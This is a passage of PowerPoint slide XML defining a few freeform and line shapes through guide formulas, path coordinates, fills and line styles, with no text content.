                  <a:cxn ang="T11">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="T12">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="T13">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="T14">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="T15" t="T16" r="T17" b="T18"/>
                <a:pathLst>
                  <a:path w="133" h="38">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="130" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10652" name="Freeform 59"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1716" y="2631"/>
                <a:ext cx="326" cy="65"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 146 w 326"/>
                  <a:gd name="T1" fmla="*/ 0 h 65"/>
                  <a:gd name="T2" fmla="*/ 115 w 326"/>
                  <a:gd name="T3" fmla="*/ 1 h 65"/>
                  <a:gd name="T4" fmla="*/ 85 w 326"/>
                  <a:gd name="T5" fmla="*/ 3 h 65"/>
                  <a:gd name="T6" fmla="*/ 60 w 326"/>
                  <a:gd name="T7" fmla="*/ 7 h 65"/>
                  <a:gd name="T8" fmla="*/ 38 w 326"/>
                  <a:gd name="T9" fmla="*/ 12 h 65"/>
                  <a:gd name="T10" fmla="*/ 28 w 326"/>
                  <a:gd name="T11" fmla="*/ 14 h 65"/>
                  <a:gd name="T12" fmla="*/ 20 w 326"/>
                  <a:gd name="T13" fmla="*/ 17 h 65"/>
                  <a:gd name="T14" fmla="*/ 13 w 326"/>
                  <a:gd name="T15" fmla="*/ 20 h 65"/>
                  <a:gd name="T16" fmla="*/ 7 w 326"/>
                  <a:gd name="T17" fmla="*/ 23 h 65"/>
                  <a:gd name="T18" fmla="*/ 4 w 326"/>
                  <a:gd name="T19" fmla="*/ 26 h 65"/>
                  <a:gd name="T20" fmla="*/ 0 w 326"/>
                  <a:gd name="T21" fmla="*/ 29 h 65"/>
                  <a:gd name="T22" fmla="*/ 0 w 326"/>
                  <a:gd name="T23" fmla="*/ 33 h 65"/>
                  <a:gd name="T24" fmla="*/ 0 w 326"/>
                  <a:gd name="T25" fmla="*/ 36 h 65"/>
                  <a:gd name="T26" fmla="*/ 4 w 326"/>
                  <a:gd name="T27" fmla="*/ 40 h 65"/>
                  <a:gd name="T28" fmla="*/ 7 w 326"/>
                  <a:gd name="T29" fmla="*/ 43 h 65"/>
                  <a:gd name="T30" fmla="*/ 13 w 326"/>
                  <a:gd name="T31" fmla="*/ 46 h 65"/>
                  <a:gd name="T32" fmla="*/ 20 w 326"/>
                  <a:gd name="T33" fmla="*/ 49 h 65"/>
                  <a:gd name="T34" fmla="*/ 28 w 326"/>
                  <a:gd name="T35" fmla="*/ 51 h 65"/>
                  <a:gd name="T36" fmla="*/ 38 w 326"/>
                  <a:gd name="T37" fmla="*/ 54 h 65"/>
                  <a:gd name="T38" fmla="*/ 60 w 326"/>
                  <a:gd name="T39" fmla="*/ 58 h 65"/>
                  <a:gd name="T40" fmla="*/ 85 w 326"/>
                  <a:gd name="T41" fmla="*/ 62 h 65"/>
                  <a:gd name="T42" fmla="*/ 115 w 326"/>
                  <a:gd name="T43" fmla="*/ 64 h 65"/>
                  <a:gd name="T44" fmla="*/ 146 w 326"/>
                  <a:gd name="T45" fmla="*/ 65 h 65"/>
                  <a:gd name="T46" fmla="*/ 180 w 326"/>
                  <a:gd name="T47" fmla="*/ 65 h 65"/>
                  <a:gd name="T48" fmla="*/ 211 w 326"/>
                  <a:gd name="T49" fmla="*/ 64 h 65"/>
                  <a:gd name="T50" fmla="*/ 241 w 326"/>
                  <a:gd name="T51" fmla="*/ 62 h 65"/>
                  <a:gd name="T52" fmla="*/ 266 w 326"/>
                  <a:gd name="T53" fmla="*/ 58 h 65"/>
                  <a:gd name="T54" fmla="*/ 288 w 326"/>
                  <a:gd name="T55" fmla="*/ 54 h 65"/>
                  <a:gd name="T56" fmla="*/ 298 w 326"/>
                  <a:gd name="T57" fmla="*/ 51 h 65"/>
                  <a:gd name="T58" fmla="*/ 306 w 326"/>
                  <a:gd name="T59" fmla="*/ 49 h 65"/>
                  <a:gd name="T60" fmla="*/ 313 w 326"/>
                  <a:gd name="T61" fmla="*/ 46 h 65"/>
                  <a:gd name="T62" fmla="*/ 319 w 326"/>
                  <a:gd name="T63" fmla="*/ 43 h 65"/>
                  <a:gd name="T64" fmla="*/ 322 w 326"/>
                  <a:gd name="T65" fmla="*/ 40 h 65"/>
                  <a:gd name="T66" fmla="*/ 325 w 326"/>
                  <a:gd name="T67" fmla="*/ 36 h 65"/>
                  <a:gd name="T68" fmla="*/ 326 w 326"/>
                  <a:gd name="T69" fmla="*/ 33 h 65"/>
                  <a:gd name="T70" fmla="*/ 325 w 326"/>
                  <a:gd name="T71" fmla="*/ 29 h 65"/>
                  <a:gd name="T72" fmla="*/ 322 w 326"/>
                  <a:gd name="T73" fmla="*/ 26 h 65"/>
                  <a:gd name="T74" fmla="*/ 319 w 326"/>
                  <a:gd name="T75" fmla="*/ 23 h 65"/>
                  <a:gd name="T76" fmla="*/ 313 w 326"/>
                  <a:gd name="T77" fmla="*/ 20 h 65"/>
                  <a:gd name="T78" fmla="*/ 306 w 326"/>
                  <a:gd name="T79" fmla="*/ 17 h 65"/>
                  <a:gd name="T80" fmla="*/ 298 w 326"/>
                  <a:gd name="T81" fmla="*/ 14 h 65"/>
                  <a:gd name="T82" fmla="*/ 288 w 326"/>
                  <a:gd name="T83" fmla="*/ 12 h 65"/>
                  <a:gd name="T84" fmla="*/ 266 w 326"/>
                  <a:gd name="T85" fmla="*/ 7 h 65"/>
                  <a:gd name="T86" fmla="*/ 241 w 326"/>
                  <a:gd name="T87" fmla="*/ 3 h 65"/>
                  <a:gd name="T88" fmla="*/ 211 w 326"/>
                  <a:gd name="T89" fmla="*/ 1 h 65"/>
                  <a:gd name="T90" fmla="*/ 180 w 326"/>
                  <a:gd name="T91" fmla="*/ 0 h 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6"/>
                  <a:gd name="T139" fmla="*/ 0 h 65"/>
                  <a:gd name="T140" fmla="*/ 326 w 326"/>
                  <a:gd name="T141" fmla="*/ 65 h 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6" h="65">
                    <a:moveTo>
                      <a:pt x="162" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="146" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="298" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="302" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="306" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="309" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="324" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="324" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="309" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="306" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="302" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="298" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="CCCCFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10653" name="Freeform 60"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1716" y="2631"/>
                <a:ext cx="326" cy="65"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 146 w 326"/>
                  <a:gd name="T1" fmla="*/ 0 h 65"/>
                  <a:gd name="T2" fmla="*/ 115 w 326"/>
                  <a:gd name="T3" fmla="*/ 1 h 65"/>
                  <a:gd name="T4" fmla="*/ 85 w 326"/>
                  <a:gd name="T5" fmla="*/ 3 h 65"/>
                  <a:gd name="T6" fmla="*/ 60 w 326"/>
                  <a:gd name="T7" fmla="*/ 7 h 65"/>
                  <a:gd name="T8" fmla="*/ 38 w 326"/>
                  <a:gd name="T9" fmla="*/ 12 h 65"/>
                  <a:gd name="T10" fmla="*/ 28 w 326"/>
                  <a:gd name="T11" fmla="*/ 14 h 65"/>
                  <a:gd name="T12" fmla="*/ 20 w 326"/>
                  <a:gd name="T13" fmla="*/ 17 h 65"/>
                  <a:gd name="T14" fmla="*/ 13 w 326"/>
                  <a:gd name="T15" fmla="*/ 20 h 65"/>
                  <a:gd name="T16" fmla="*/ 7 w 326"/>
                  <a:gd name="T17" fmla="*/ 23 h 65"/>
                  <a:gd name="T18" fmla="*/ 4 w 326"/>
                  <a:gd name="T19" fmla="*/ 26 h 65"/>
                  <a:gd name="T20" fmla="*/ 0 w 326"/>
                  <a:gd name="T21" fmla="*/ 29 h 65"/>
                  <a:gd name="T22" fmla="*/ 0 w 326"/>
                  <a:gd name="T23" fmla="*/ 33 h 65"/>
                  <a:gd name="T24" fmla="*/ 0 w 326"/>
                  <a:gd name="T25" fmla="*/ 36 h 65"/>
                  <a:gd name="T26" fmla="*/ 4 w 326"/>
                  <a:gd name="T27" fmla="*/ 40 h 65"/>
                  <a:gd name="T28" fmla="*/ 7 w 326"/>
                  <a:gd name="T29" fmla="*/ 43 h 65"/>
                  <a:gd name="T30" fmla="*/ 13 w 326"/>
                  <a:gd name="T31" fmla="*/ 46 h 65"/>
                  <a:gd name="T32" fmla="*/ 20 w 326"/>
                  <a:gd name="T33" fmla="*/ 49 h 65"/>
                  <a:gd name="T34" fmla="*/ 28 w 326"/>
                  <a:gd name="T35" fmla="*/ 51 h 65"/>
                  <a:gd name="T36" fmla="*/ 38 w 326"/>
                  <a:gd name="T37" fmla="*/ 54 h 65"/>
                  <a:gd name="T38" fmla="*/ 60 w 326"/>
                  <a:gd name="T39" fmla="*/ 58 h 65"/>
                  <a:gd name="T40" fmla="*/ 85 w 326"/>
                  <a:gd name="T41" fmla="*/ 62 h 65"/>
                  <a:gd name="T42" fmla="*/ 115 w 326"/>
                  <a:gd name="T43" fmla="*/ 64 h 65"/>
                  <a:gd name="T44" fmla="*/ 146 w 326"/>
                  <a:gd name="T45" fmla="*/ 65 h 65"/>
                  <a:gd name="T46" fmla="*/ 180 w 326"/>
                  <a:gd name="T47" fmla="*/ 65 h 65"/>
                  <a:gd name="T48" fmla="*/ 211 w 326"/>
                  <a:gd name="T49" fmla="*/ 64 h 65"/>
                  <a:gd name="T50" fmla="*/ 241 w 326"/>
                  <a:gd name="T51" fmla="*/ 62 h 65"/>
                  <a:gd name="T52" fmla="*/ 266 w 326"/>
                  <a:gd name="T53" fmla="*/ 58 h 65"/>
                  <a:gd name="T54" fmla="*/ 288 w 326"/>
                  <a:gd name="T55" fmla="*/ 54 h 65"/>
                  <a:gd name="T56" fmla="*/ 298 w 326"/>
                  <a:gd name="T57" fmla="*/ 51 h 65"/>
                  <a:gd name="T58" fmla="*/ 306 w 326"/>
                  <a:gd name="T59" fmla="*/ 49 h 65"/>
                  <a:gd name="T60" fmla="*/ 313 w 326"/>
                  <a:gd name="T61" fmla="*/ 46 h 65"/>
                  <a:gd name="T62" fmla="*/ 319 w 326"/>
                  <a:gd name="T63" fmla="*/ 43 h 65"/>
                  <a:gd name="T64" fmla="*/ 322 w 326"/>
                  <a:gd name="T65" fmla="*/ 40 h 65"/>
                  <a:gd name="T66" fmla="*/ 325 w 326"/>
                  <a:gd name="T67" fmla="*/ 36 h 65"/>
                  <a:gd name="T68" fmla="*/ 326 w 326"/>
                  <a:gd name="T69" fmla="*/ 33 h 65"/>
                  <a:gd name="T70" fmla="*/ 325 w 326"/>
                  <a:gd name="T71" fmla="*/ 29 h 65"/>
                  <a:gd name="T72" fmla="*/ 322 w 326"/>
                  <a:gd name="T73" fmla="*/ 26 h 65"/>
                  <a:gd name="T74" fmla="*/ 319 w 326"/>
                  <a:gd name="T75" fmla="*/ 23 h 65"/>
                  <a:gd name="T76" fmla="*/ 313 w 326"/>
                  <a:gd name="T77" fmla="*/ 20 h 65"/>
                  <a:gd name="T78" fmla="*/ 306 w 326"/>
                  <a:gd name="T79" fmla="*/ 17 h 65"/>
                  <a:gd name="T80" fmla="*/ 298 w 326"/>
                  <a:gd name="T81" fmla="*/ 14 h 65"/>
                  <a:gd name="T82" fmla="*/ 288 w 326"/>
                  <a:gd name="T83" fmla="*/ 12 h 65"/>
                  <a:gd name="T84" fmla="*/ 266 w 326"/>
                  <a:gd name="T85" fmla="*/ 7 h 65"/>
                  <a:gd name="T86" fmla="*/ 241 w 326"/>
                  <a:gd name="T87" fmla="*/ 3 h 65"/>
                  <a:gd name="T88" fmla="*/ 211 w 326"/>
                  <a:gd name="T89" fmla="*/ 1 h 65"/>
                  <a:gd name="T90" fmla="*/ 180 w 326"/>
                  <a:gd name="T91" fmla="*/ 0 h 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6"/>
                  <a:gd name="T139" fmla="*/ 0 h 65"/>
                  <a:gd name="T140" fmla="*/ 326 w 326"/>
                  <a:gd name="T141" fmla="*/ 65 h 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6" h="65">
                    <a:moveTo>
                      <a:pt x="162" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="146" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="298" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="302" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="306" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="309" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="324" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="324" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="309" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="306" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="302" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="298" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="0"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="14288">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10654" name="Line 61"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1716" y="2625"/>
                <a:ext cx="1" cy="41"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="14288">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10655" name="Line 62"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
